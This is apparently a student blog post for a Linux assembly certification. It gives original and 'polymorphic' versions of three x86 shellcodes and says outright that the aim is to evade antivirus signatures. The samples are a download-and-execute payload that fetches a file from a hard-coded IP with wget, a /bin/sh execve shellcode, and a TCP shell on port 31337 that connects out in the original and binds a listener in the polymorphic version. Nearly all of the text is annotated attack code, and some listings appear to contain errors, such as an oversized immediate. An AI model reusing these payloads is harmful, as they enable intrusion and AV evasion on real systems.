Assignment #6: Create 3 polymorphic versions of shellcodes from Shell-Storm

In this assignment, the objective was to create three polymorphic versions of the following shellcode samples:




The purpose of this objective is to leverage alternate instructions that do essentially the same thing in order to beat AV signatures; for example, each of the following zeroes a register:



  • xor    eax,eax
  • lea     ebx,[0]
  • loop   $
  • mov   edx,0
  • and    esi,0
  • sub    edi,edi
  • push  0
  • pop    ebp

The first sample, shellcode-862, downloads a file from a hard-coded IP address using wget and then changes the downloaded file's permissions to executable.


The listing below shows the original version and the polymorphic version.



Original Version
Polymorphic Version

; shellcode-862 (original), Linux x86, NASM syntax, int 0x80 syscalls.
; Flow: fork(); parent: wait(), chmod("x", 0777), execve("x");
;       child: execve("/usr/bin/wget", ["/usr/bin/wget", "192.168.2.222//x", NULL], NULL).
global _start
section .text
_start:
;fork
xor eax,eax
mov al,0x2                      ; eax = 2 (fork)
int 0x80
xor ebx,ebx
cmp eax,ebx                     ; fork() returns 0 in the child
jz child
;wait(NULL)
xor eax,eax
mov al,0x7                      ; eax = 7 (waitpid)
int 0x80
;chmod x
xor ecx,ecx
xor eax, eax
push eax                        ; NUL terminator for the path
mov al, 0xf                     ; eax = 15 (chmod)
push 0x78                       ; "x" -> path "x\0" on the stack
mov ebx, esp                    ; ebx = path
xor ecx, ecx
mov cx, 0x1ff                   ; ecx = mode 0777
int 0x80
;exec x
xor eax, eax
push eax                        ; NUL terminator
push 0x78                       ; "x"
mov ebx, esp                    ; ebx = filename "x"
push eax                        ; NULL
mov edx, esp                    ; edx = envp -> [NULL]
push ebx
mov ecx, esp                    ; ecx = argv -> ["x", NULL]
mov al, 11                      ; eax = 11 (execve)
int 0x80
child:
;download 192.168.2.222//x with wget
push 0xb
pop eax                         ; eax = 11 (execve)
cdq                             ; edx = sign of eax = 0; reused as NULL below
push edx                        ; NUL terminator
push 0x782f2f32 ;2//x avoid null byte
push 0x32322e32 ;22.2
push 0x2e383631 ;.861
push 0x2e323931 ;.291
mov ecx,esp                     ; ecx = "192.168.2.222//x"
push edx                        ; NUL terminator
push 0x74 ;t
push 0x6567772f ;egw/
push 0x6e69622f ;nib/
push 0x7273752f ;rsu/
mov ebx,esp                     ; ebx = "/usr/bin/wget"
push edx                        ; argv terminator (NULL)
push ecx                        ; argv[1] = URL
push ebx                        ; argv[0] = wget path
mov ecx,esp                     ; ecx = argv; edx (0) = envp
int 0x80

; shellcode-862 (polymorphic version), Linux x86, NASM syntax.
; Same structure as the original (fork; parent: wait, chmod, execve "x";
; child: wget), with the xor-zeroing replaced by mul/lea and several
; push sequences replaced by stores below esp.
global _start
section .text
_start:
;fork
mul edx                         ; eax = eax*edx, edx = high half; presumably relies on edx == 0 at entry so both end up 0 -- confirm for the target loader
mov al,0x2                      ; eax = 2 (fork)
int 0x80
cmp eax, edx                    ; compare with edx: fork() returns 0 in the child
jz child
;wait(NULL)
lea eax, [edx]                  ; eax = edx without touching flags
mov al,0x7                      ; eax = 7 (waitpid)
int 0x80
;chmod x
lea ecx, [edx]                  ; ecx = edx
mov dword [esp-0x4], ecx        ; store ecx below esp (no push; esp is unchanged)
mov al, 0xf                     ; eax = 15 (chmod)
mov dword [esp-0x8], 0x78       ; store "x" below the value written above
mov al, 0xe
add al, 0x1                     ; al = 0xe + 1 = 0xf (chmod) again
mov ebx, esp                    ; ebx = esp
mov cx, 0x1ff                   ; cx = 0777; the upper half of ecx is whatever lea left there
int 0x80
;exec x
mov dword ebx, [esp-0x12]       ; ebx = dword at esp-0x12 ...
mov dword ebx, [esp-0x8]        ; ... immediately overwritten: ebx = dword at esp-0x8 (where 0x78 was stored)
push eax                        ; eax still holds the chmod return value here
mov edx, esp                    ; edx = esp
push ebx
mov ecx, esp                    ; ecx = esp
mov al, 11                      ; al = 11 (execve)
int 0x80
child:
;download 192.168.2.222//x with wget
push 0xb
pop eax                         ; eax = 11 (execve)
cdq                             ; edx = sign of eax = 0; reused as NULL below
push edx                        ; NUL terminator
push 0x782f2f32 ;2//x avoid null byte
push 0x32322e32 ;22.2
push 0x2e383631 ;.861
push 0x2e323931 ;.291
mov ecx,esp                     ; ecx = "192.168.2.222//x"
push edx                        ; NUL terminator
push 0x74 ;t
push 0x6567772f ;egw/
push 0x6e69622f ;nib/
push 0x7273752f ;rsu/
mov ebx,esp                     ; ebx = "/usr/bin/wget"
push edx                        ; argv terminator (NULL)
push ecx                        ; argv[1] = URL
push ebx                        ; argv[0] = wget path
mov ecx,esp                     ; ecx = argv; edx (0) = envp
int 0x80

The next sample, shellcode-111, was built to run execve("/bin/sh").
As shown earlier, the listing below includes the original and polymorphic versions:


Original Version
Polymorphic Version

# shellcode-111 (original), Linux x86: execve("/bin//sh", NULL, NULL), then exit().
# Note: the operands are in AT&T order (source, destination) with %reg / $imm,
# even though the directives above are NASM-style.
global _start
section .text
_start:
xor %eax,%eax                   # eax = 0
push %eax                       # NUL terminator
push $0x68732f2f                # "//sh"
push $0x6e69622f                # "/bin" -> "/bin//sh" on the stack
mov %esp,%ebx                   # ebx = filename
mov %eax,%ecx                   # ecx = argv = NULL
mov %eax,%edx                   # edx = envp = NULL
mov $0xb,%al                    # eax = 11 (execve)
int $0x80
xor %eax,%eax
inc %eax                        # eax = 1 (exit)
int $0x80                       # exit(); ebx still holds the string pointer, so that is the status

; shellcode-111 (polymorphic version), Linux x86, NASM syntax:
; builds "/bin//sh\0" with stores into a reserved stack area instead of
; pushes, then execve(). Unlike the original there is no exit() call after it.
global _start
section .text
_start:
xor ecx, ecx                    ; ecx = 0
mul ecx                         ; eax = eax*0 = 0, edx = high half = 0
sub esp, 0xc                    ; reserve 12 bytes for the path
mov dword[esp+0x8], ecx         ; [esp+8] = 0: NUL terminator
mov edx,0x57621e1e
add edx,0x111111111             ; edx = 0x57621e1e + imm, presumably meant to form the "//sh" dword of the original; NOTE(review): the immediate as written has nine hex digits (36 bits) and does not fit a 32-bit operand -- looks like a transcription error, confirm against the repository
mov dword[esp+0x4], edx         ; [esp+4] = second dword of the path
mov edx, ecx                    ; edx = envp = NULL
mov dword[esp],0x6e69622f       ; [esp] = "/bin"
mov ebx, esp                    ; ebx = filename; ecx = argv = NULL
mov al, 0xb                     ; eax = 11 (execve)
int 0x80

The last sample, shellcode-849, is designed to create a TCP bind shell on port 31337,
and its original form and its polymorphic version are shown below:


Original Version
Polymorphic Version

; shellcode-849 (original), Linux x86, NASM syntax. As listed it does:
;   s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)        via socketcall
;   connect(s, {AF_INET, 31337, 192.168.1.10}, 16)       via socketcall (bl == 3 at the call)
;   dup2(3, 2), dup2(3, 1), dup2(3, 0)
;   execve("//bin/sh", ["//bin/sh", NULL], [NULL])
; NOTE(review): bl is incremented to 3 (SYS_CONNECT) before the second
; socketcall, so as written this connects out rather than bind()ing as the
; write-up says -- confirm against the upstream sample.
global _start
section .text
_start:
xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx                     ; edx stays 0 and is reused as NULL/terminator below
mov al,0x66                     ; eax = 102 (socketcall)
mov bl,0x1                      ; ebx = 1 (SYS_SOCKET)
push ecx                        ; 0 (unused fourth slot)
push 0x6                        ; protocol = 6 (IPPROTO_TCP)
push 0x1                        ; type = 1 (SOCK_STREAM)
push 0x2                        ; domain = 2 (AF_INET)
mov ecx,esp                     ; ecx = args array
int 0x80
mov esi,eax                     ; esi = socket fd
mov al,0x66                     ; socketcall again
xor ebx,ebx
mov bl,0x2                      ; ebx = 2
push 0xa01a8c0                  ; sin_addr bytes c0 a8 01 0a = 192.168.1.10
pushw 0x697a                    ; sin_port bytes 7a 69 = 31337 in network order
push bx                         ; sin_family = 2 (AF_INET)
inc bl                          ; ebx = 3 (SYS_CONNECT): this is the call number used below
mov ecx,esp                     ; ecx = &sockaddr_in
push 0x10                       ; addrlen = 16
push ecx                        ; &sockaddr
push esi                        ; socket fd
mov ecx,esp                     ; ecx = args array
int 0x80
xor ecx,ecx
mov cl,0x3                      ; newfd counter: runs 2, 1, 0
dupfd:
dec cl
mov al,0x3f                     ; eax = 63 (dup2); oldfd = ebx (3, presumably the socket fd -- assumes fds 0-2 were the only ones open), newfd = ecx
int 0x80
jne 804809a                     ; raw address from a disassembly, not a label in this listing; presumably the dupfd loop -- confirm. The condition comes from `dec cl` above, across the int 0x80.
xor eax,eax
push edx                        ; NUL terminator
push 0x68732f6e                 ; "n/sh"
push 0x69622f2f                 ; "//bi" -> "//bin/sh"
mov ebx,esp                     ; ebx = filename
push edx                        ; argv terminator
push ebx                        ; argv[0]
mov ecx,esp                     ; ecx = argv
push edx
mov edx,esp                     ; edx = envp -> [NULL]
mov al,0xb                      ; eax = 11 (execve)
int 0x80

; shellcode-849 (polymorphic version), Linux x86, NASM syntax. As listed:
;   s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
;   bind(s, {AF_INET, 31337, INADDR_ANY}, 0xa)
;   listen(s, 1); c = accept(s, NULL, NULL)
;   dup2(c, 2), dup2(c, 1), dup2(c, 0)
;   execve("//bin/sh", ["//bin/sh", NULL], [NULL])
; Uses mul for zeroing and push/pop for small immediates instead of mov.
global _start
section .text
_start:
xor ecx, ecx                    ; ecx = 0
mul ecx                         ; eax = 0, edx = 0 (edx reused as NULL below)
mov ebx, ecx                    ; ebx = 0
push 0x66
pop eax                         ; eax = 102 (socketcall)
push 0x1
pop ebx                         ; ebx = 1 (SYS_SOCKET)
push edx                        ; 0 (unused fourth slot)
push 0x6                        ; protocol = 6 (IPPROTO_TCP)
push 0x1                        ; type = 1 (SOCK_STREAM)
push 0x2                        ; domain = 2 (AF_INET)
mov ecx, esp                    ; ecx = args array
int 0x80
xchg edi, eax                   ; edi = socket fd
push 0x66
pop eax                         ; socketcall
inc ebx                         ; ebx = 2 (SYS_BIND)
push edx                        ; sin_addr = 0 (INADDR_ANY)
mov ecx, 0x5869
add ecx, 0x1111                 ; ecx = 0x697a -> sin_port 31337 in network order; upper half is zero padding
push ecx
push bx                         ; sin_family = 2 (AF_INET)
mov ecx, esp                    ; ecx = &sockaddr_in
push 0xa                        ; addrlen = 10
push ecx                        ; &sockaddr
push edi                        ; socket fd
mov ecx, esp                    ; ecx = args array
int 0x80
push 0x66
pop eax                         ; socketcall
inc ebx
inc ebx                         ; ebx = 4 (SYS_LISTEN)
push 0x1                        ; backlog = 1
push edi                        ; socket fd
mov ecx, esp                    ; ecx = args array
int 0x80
push 0x66
pop eax                         ; socketcall
inc ebx                         ; ebx = 5 (SYS_ACCEPT)
push edx                        ; addrlen = NULL
push edx                        ; addr = NULL
push edi                        ; socket fd
mov ecx, esp                    ; ecx = args array
int 0x80
mov ebx, eax                    ; ebx = accepted client fd (dup2 oldfd)
xor ecx, ecx
push byte 0x2
pop ecx                         ; newfd counter: 2, 1, 0
loop:
mov al, 0x3f                    ; al = 63 (dup2); the upper bytes of eax are left as the previous syscall's return
int 0x80
dec ecx
jns loop                        ; repeat while ecx >= 0

mov eax, edx                    ; eax = 0
push edx                        ; NUL terminator
push 0x68732f6e                 ; "n/sh"
    push 0x69622f2f             ; "//bi" -> "//bin/sh"
mov ebx,esp                     ; ebx = filename
push edx                        ; argv terminator
push ebx                        ; argv[0]
mov ecx,esp                     ; ecx = argv
push edx
mov edx,esp                     ; edx = envp -> [NULL]
mov al,0xb                      ; eax = 11 (execve)
int 0x80

This blog post has been created to complete the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: PA-7730
All source files can be found on GitHub at https://github.com/br0ns0n/SLAE32
